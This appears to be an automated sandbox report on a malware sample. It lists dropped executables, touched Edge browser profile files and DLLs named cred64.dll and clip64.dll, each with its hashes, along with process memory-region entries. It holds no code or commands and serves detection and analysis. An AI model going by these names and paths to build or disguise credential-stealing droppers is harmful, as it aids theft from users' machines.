memory/552-205-0x00000000071B0000-0x00000000071C0000-memory.dmp

\??\pipe\LOCAL\crashpad_4708_QUQYDCTHSRKMTGAK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 395ba401afd554c1e08117673729c2e7
SHA1 398883123954c1abdfeb63902fb0a7416ef19de1
SHA256 a439ff01d8d86974bf2664e8b52ce2f684fc83ddf934c605ef611d48a76ce729
SHA512 8cccc7814026de8ae4d887c1498d6cad6075b9e40ab17193f8fd7cfd00b05a81e3b6c1adeba25405f25f827e540768d02f3290fe8c5ab4364955be73d9099d2c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 1f6109e3f423fe5174c004feabaa5ff4
SHA1 d043a2bd5898c1e8a4831bb22e925fcf49916066
SHA256 e407b570f70d8508aad100afa7c08b270449ebece553c3ecfcd674d397b7c79a
SHA512 674a9f8fdf3fed90a945d0c828b6a433a892172e8f4cb979506cc11ed070f7b988cd78b451fecaa18ed640a2910417db40dafb29a77ec5c879fef3205bd5049e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0c5fd1639617f9d7892fd660dd99b64e
SHA1 20576f4e272389c306af55dc61a14fbca2a9ab8a
SHA256 9be8e25e2b73e07eea8412ec942bae5f00fe1536df5a6047a505db8e3d82b562
SHA512 9141c3094ccfbd5bb74a670800cee057ef5f66acd5fec8099763e6e77989ed3e579a7bd0038067672ea1b038f47d94333fc7a94ead25cc781f2a57a01869ac04

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 f1881400134252667af6731236741098
SHA1 6fbc4f34542d449afdb74c9cfd4a6d20e6cdc458
SHA256 d6fcec1880d69aaa0229f515403c1a5ac82787f442c37f1c0c96c82ec6c15b75
SHA512 18b9ac92c396a01b6662a4a8a21b995d456716b70144a136fced761fd0a84c99e8bd0afb9585625809b87332da75727b82a07b151560ea253a3b8c241b799450

C:\Users\Admin\AppData\Local\Temp\888B.exe

MD5 a0ec83b955c8a65f5ecce0e8e7be6f57
SHA1 bb64ddfdf3d03160ff2622ababc021296773f6fa
SHA256 15ac76fbfa706eba90fa943d3417ef3de45bf8d21c1f77bd4dd6ebfbfb87d621
SHA512 06989db3d2a187d70e70bcb8c1deb7d053ac61125dcc17380beda2068a9351ce721f7da1f64bff79ed8b7c1a7ec15daa39dd98629a2e7dbf9c762f38e707150e

C:\Users\Admin\AppData\Local\Temp\888B.exe

MD5 a0ec83b955c8a65f5ecce0e8e7be6f57
SHA1 bb64ddfdf3d03160ff2622ababc021296773f6fa
SHA256 15ac76fbfa706eba90fa943d3417ef3de45bf8d21c1f77bd4dd6ebfbfb87d621
SHA512 06989db3d2a187d70e70bcb8c1deb7d053ac61125dcc17380beda2068a9351ce721f7da1f64bff79ed8b7c1a7ec15daa39dd98629a2e7dbf9c762f38e707150e

memory/4052-243-0x0000000073440000-0x0000000073BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8B8A.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

C:\Users\Admin\AppData\Local\Temp\8B8A.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

memory/4052-248-0x0000000000DC0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8D31.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

C:\Users\Admin\AppData\Local\Temp\8D31.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/1332-262-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1332-267-0x00000000004D0000-0x000000000052A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 498af485852079b7064dd1675377809f
SHA1 a6a36a996b5f1d2dab2eb4232f65275cb1df4030
SHA256 e56a79a9de6b1e161d5cb6969bd056062565f2525800b38f205bd41eb45bd0f6
SHA512 04c5e5cebf49162b6947172d1409ba8e419e39260aed3832b39e1846b9fd2dcb06590983f2b067f5601b8006bf79d7973df47d2776de5f33621ddc945f98e344

C:\Users\Admin\AppData\Local\Temp\8D31.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

memory/552-285-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/1332-287-0x0000000073440000-0x0000000073BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/3416-296-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

C:\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

memory/5132-312-0x0000000000F40000-0x0000000000F48000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Temp\7zS9778.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

C:\Users\Admin\AppData\Local\Temp\7zS9778.tmp\Install.exe

MD5 6a77181784bc9e5a81ed1479bcee7483
SHA1 f7bc21872e7016a4945017c5ab9b922b44a22ece
SHA256 38bab577cf37ed54d75c3c16cfa5c0c76391b3c27e9e9c86ee547f156679f2a7
SHA512 e6c888730aa28a8889fe0c96be0c19aad4a5136e8d5a3845ca8a835eb85d5dba1b644c6c18913d56d516ce02a81cd875c03b85b0e1e41ef8fd32fd710665332f

memory/552-306-0x00000000071B0000-0x00000000071C0000-memory.dmp

memory/5132-322-0x00007FF904790000-0x00007FF905251000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/5132-325-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/4052-326-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/1596-297-0x000000000058E000-0x00000000005A3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6a085a5ce478080d06a5035eaee7d97c
SHA1 75e774ca09a447b2836a14c9fe5e4d88a4ac37cb
SHA256 4d8d88228d68177f05233f9355fa8b25cee3a9bbcc96b47eeb9f12ec5c828457
SHA512 308d05358754432778f38a00097f2f2b0c085a9eabfe9621d36d46c41b76d54a5c3d54b0c3f194b1ce970d74c8138cad6d7ee57236a5e9ba1b055bbce670b366

memory/3968-327-0x0000000002B20000-0x0000000002F1B000-memory.dmp

memory/1596-293-0x0000000000550000-0x0000000000559000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/3968-332-0x0000000002F20000-0x000000000380B000-memory.dmp

memory/3416-289-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8D31.exe

MD5 8e4c82c39fdb3c524a81f62ded2d6c2e
SHA1 bde413f720af010f5c9d8f745d79be00c0fd3c1e
SHA256 be534d74fab71aae643e680faf16cc0d6150f8653afe3c7fc9f949ca7f2e48e7
SHA512 c88868cdc8f6c66e5fe0c1073ae394a03a20f5530de057e5fb604fef25754bf1bd26e70eba67b7cd610e50313bfc8190adb684b084b6d0dc1ac833a06d35edb2

C:\Users\Admin\AppData\Local\Temp\setup.exe

MD5 cac360e5fb18e8f135b7008cb478e15a
SHA1 37e4f9b25237b12ab283fc70bf89242ab3b83875
SHA256 e8689f69dd3d0a3bd5f6e4b3a85251583c4b3b1dbf03e0c30c6cf0048e6532f8
SHA512 7f0bd6103dd802de4a4665b460c8c178f32e6075094532ec43c83fc1d8595d9495772bf191669f4b72cc2d78f91b06e046a11bbd0ef935b040eeb31e741d2a32

memory/3968-335-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A32B.exe

MD5 e2ff8a34d2fcc417c41c822e4f3ea271
SHA1 926eaf9dd645e164e9f06ddcba567568b3b8bb1b
SHA256 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0
SHA512 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2

memory/1332-345-0x0000000000400000-0x000000000047E000-memory.dmp

memory/1332-347-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/5448-346-0x0000000073440000-0x0000000073BF0000-memory.dmp

memory/5448-348-0x0000000000710000-0x0000000000AF0000-memory.dmp

memory/5468-349-0x0000000000990000-0x000000000107F000-memory.dmp

memory/5448-350-0x0000000005400000-0x000000000549C000-memory.dmp

memory/3416-371-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3108-352-0x00000000033D0000-0x00000000033E6000-memory.dmp

memory/5468-375-0x0000000010000000-0x000000001057B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 9f7dfb92ef279114a1cb932017759242
SHA1 218ac21b877601321e4f5465ae5d3cda9fb97953
SHA256 6df35dde535b3b64d04ee248ce64ee77c00ad0412c4b7e59267c7f913960a6b4
SHA512 1631d8363e79b6284d743b8467367f0969a04bd6c136c25985f6098fc7a74d3dbedc8199ffb0b8c461d00d791dea31fa7d503c0cba1361444d3058f482156f32

memory/5752-386-0x0000000000400000-0x0000000000414000-memory.dmp

memory/5132-390-0x00007FF904790000-0x00007FF905251000-memory.dmp

memory/3968-392-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5836-401-0x0000000000730000-0x0000000000731000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 7ec8b6ebd5f11395d23a0b0e16078bb5
SHA1 de8f855775c8002da6439c5a00e0285e5b43845b
SHA256 bd0567da62a39e399597f9b5af9956534560839c25b7455355b4738439992ac1
SHA512 66045e2324214ec6aee8fb14cd8f66f653c85fd8670c4bb0b3e4fbfcb10fa5abb79fd8366b74da992bf1683927b55d14a97e384f4cfa2a655f5d994862b77cc5

memory/5232-411-0x00007FF79DED0000-0x00007FF79E471000-memory.dmp

memory/3968-412-0x0000000002B20000-0x0000000002F1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/3968-444-0x0000000002F20000-0x000000000380B000-memory.dmp

memory/5448-462-0x00000000013D0000-0x00000000013DA000-memory.dmp

memory/5448-476-0x0000000002BA0000-0x0000000002BA8000-memory.dmp

memory/5836-473-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/5752-456-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4964-481-0x0000000000400000-0x0000000000636000-memory.dmp

memory/3968-484-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5448-483-0x00000000054A0000-0x0000000005632000-memory.dmp

memory/4964-485-0x0000000000400000-0x0000000000636000-memory.dmp

memory/5448-491-0x0000000005AA0000-0x0000000005AB0000-memory.dmp

memory/5448-502-0x0000000005690000-0x00000000056A0000-memory.dmp

memory/5448-504-0x0000000005690000-0x00000000056A0000-memory.dmp

memory/5448-505-0x0000000005690000-0x00000000056A0000-memory.dmp

memory/5448-507-0x0000000005690000-0x00000000056A0000-memory.dmp

memory/5448-509-0x0000000005C90000-0x0000000005D90000-memory.dmp

memory/5136-506-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5136-512-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5448-511-0x0000000005C90000-0x0000000005D90000-memory.dmp

memory/5136-515-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5448-492-0x0000000005690000-0x00000000056A0000-memory.dmp

memory/3968-486-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 93fd259f1cf2abfaa32ac8e56daec3df
SHA1 c80d99902b531ddd6670de8631ebbd90a088768b
SHA256 1e6f026ed4229027f29441d636f6edc085b8aecafde0aff0582cc8cd49896a9e
SHA512 f1952259a3b6ddbbd53293fa4a017861ec8bd6001d56addeb78b1f372fb92ceb762f6399ed1353441747dbde656ff0a8ec268d3ca862f1b2dd1f32c4aae3b0ba

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v345aetf.v5u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2a877b21a80ec47d9cb18374151f5162
SHA1 21ac45a90c55fbe6aa17bbcf75fefe627b46f7f6
SHA256 10ad59705a5ca0cec36ccbb54d35b2b4fd3e612ccabe92883158f769864f9421
SHA512 e13687f7846b21464ce298fc99ad3e7fa7a5fcccee4c6cf48052a90ff58c167692ae9ebda43aaafc1740e68a7693cf495f0820230d44c64731b38f2ea16ae1dc

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58f817.TMP

MD5 e76c1db682a13c7077ca5f4b392a01f4
SHA1 286551cccf3937f5c871894f0b200418abae49e2
SHA256 1db14a02edcde1b71538e9b7b81f161872f6df51cbf34a044ff2be4c1fcc47be
SHA512 8408d26056e9f12440652c68a82a9e1532f4fa5ec059777b4a798ab39cf5ca8ba423e1e680dc77a6b0f2a969d154fa347d694f20a262ea69cc52ead37bdacc3d

memory/5836-565-0x0000000000400000-0x00000000004BA000-memory.dmp

memory/3968-566-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/5728-598-0x0000000000400000-0x0000000000636000-memory.dmp